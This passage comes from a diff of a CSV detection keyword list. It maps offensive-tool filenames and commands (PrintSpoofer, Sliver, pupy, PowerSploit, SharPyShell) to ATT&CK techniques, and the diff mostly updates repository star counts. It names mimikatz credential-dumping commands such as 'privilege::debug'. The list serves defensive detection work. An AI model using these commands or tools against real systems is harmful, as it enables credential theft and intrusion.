through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1569","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" -"*PrintSpoofer.exe*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1569","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*PrintSpoofer.cpp*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*PrintSpoofer.cpp*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*PrintSpoofer.exe*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" "*printspoofer.exe*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" "*printspoofer.py*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" -"*PrintSpoofer.sln*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1569","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*PrintSpoofer.sln*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" "*PrintSpoofer_x64.exe*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" -"*PrintSpoofer32.exe*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1569","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" -"*PrintSpoofer32.exe*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1569","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" -"*PrintSpoofer64.exe*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1569","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" -"*PrintSpoofer64.exe*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1569","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" -"*PrintSpoofer-master*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1569","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" -"*PrintSpoofer-master*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1569","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*PrintSpoofer32.exe*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - 
T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*PrintSpoofer32.exe*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*PrintSpoofer64.exe*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*PrintSpoofer64.exe*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*PrintSpoofer-master*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*PrintSpoofer-master*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" "*Priv Esc Check Bof*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that 
detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" -"*priv/priv_windows.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*priv/priv_windows.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*privcheck.cna*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" "*privcheck32*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/mertdas/PrivKit","1","1","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" "*PrivEditor.dll*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" -"*Privesc.psm1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Privesc.tests.ps1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*privesc_checker*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*privesc_checker.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*Privesc.psm1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Privesc.tests.ps1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*privesc_checker*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*privesc_checker.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*privesc_juicy_potato.py*","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1100 - T1059 - T1505","TA0002 - TA0003 - TA0004","N/A","N/A","Web Attacks","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","9","809","144","2023-09-27T08:48:31Z","2019-03-10T22:09:40Z" "*privesc_powerup.py*","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1100 - T1059 - T1505","TA0002 - TA0003 - TA0004","N/A","N/A","Web Attacks","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","9","809","144","2023-09-27T08:48:31Z","2019-03-10T22:09:40Z" "*privesc-check*","offensive_tool_keyword","windows-privesc-check","privesc script checker - Windows-privesc-check is standalone executable that runs on Windows systems. It tries to find misconfigurations that could allow local unprivileged users to escalate privileges to other users or to access local apps (e.g. 
databases).","T1048 - T1059 - T1088 - T1208","TA0004 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/pentestmonkey/windows-privesc-check","1","1","N/A","N/A","10","1394","336","2023-08-01T07:35:20Z","2015-03-22T13:39:38Z" -"*PrivescCheck.ps1*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*PrivescCheck_*.*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*PrivescCheckAsciiReport*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*PrivescCheck.ps1*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*PrivescCheck_*.*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*PrivescCheckAsciiReport*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" "*PrivEscManager.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*privexchange.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*privexchange.py*","offensive_tool_keyword","PrivExchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1091.001 - T1101 - T1201 - T1570","TA0006","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","10","905","170","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z" 
@@ -15114,16 +15282,16 @@ "*PrivExchange-master.zip*","offensive_tool_keyword","privexchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1053.005 - T1078 - T1069.002","TA0002 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","10","905","170","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z" "*PrivFu-main.zip*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" "*PrivFu-master*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" -"*privilege::backup*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*privilege::debug*","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*privilege::debug*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*privilege::driver*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*privilege::id*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*privilege::name*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*privilege::restore*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*privilege::security*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*privilege::sysenv*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*privilege::tcb*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*privilege::backup*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
